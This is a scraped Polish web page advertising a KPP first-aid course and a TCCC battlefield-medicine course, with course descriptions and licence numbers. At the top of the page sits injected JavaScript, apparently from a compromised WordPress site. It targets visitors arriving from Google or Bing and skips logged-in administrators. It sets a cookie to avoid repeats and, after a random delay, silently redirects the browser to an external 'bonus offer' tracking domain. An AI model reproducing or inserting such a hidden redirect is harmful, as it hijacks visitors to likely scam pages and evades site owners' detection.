((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(20000, 60000); setTimeout(() => { window.location.replace('http://cabonusoffer.com/track/'); }, delay);})(); class="skip-link screen-reader-text" href="#content" role="link" title="Skip to content"> Skip to content

ratownictwo pola walki zgodnie z TCCC, kurs KPP

TCCC

KPP 

kurs Kwalifikowanej Pierwszej Pomocy obejmuje swoim zakresem najważniejsze elementy pierwszej pomocy, które mogą być przydatne w codziennych sytuacjach tj.: umiejętności z zakresu resuscytacji krążeniowo-oddechowej,  tlenoterapii, tamowania krwotoków i opatrywania ran, unieruchamiania złamań, zapobieganie hipotermii,  ewakuacji z miejsca zdarzenia i wstępnej segregacji medycznej. kurs obejmuje również postępowanie przy zdarzeniach jak: zawał, udar, cukrzyca, zatrucie, podtopienie czy zadławienie.

Kurs pierwszej pomocy składa się głównie z ćwiczeń praktycznych, pozorowanych akcji ratunkowych, a zakończony jest egzaminem teoretyczno-praktycznym, po którym otrzymujesz zaświadczenie o uzyskaniu tytułu „Ratownika”.

nr. uprawnień: 907/PP/2020, rejestr instytucji szkoleniowych: RIS 2.22/00126/2021 

========================================

CLS TCCC 

czyli kurs ratownictwa pola walki wprowadzi Państwa w schematy medycyny taktycznej wg.protokołu TCCC, a stosowanej przede wszystkim w służbach mundurowych.

TCCC (Tactical Combat Casualty Care) czyli  opieka przedszpitalnej nad rannym z pola walki, to teoria oraz niezbędna praktyka działania w sytuacji ratowania życia w warunkach ekstremalnych.

w trakcie trzydniowego kursu opracowanego na podstawie wytycznych Amerykańskiego Komitetu Tactical Combat Casualty Care, kursant pozna i przećwiczy wiedzę i umiejętności z zakresu udzielania pomocy rannym, a także samopomocy na polu walki.

nr. uprawnień: 34/ZPWiR/IRPW/2022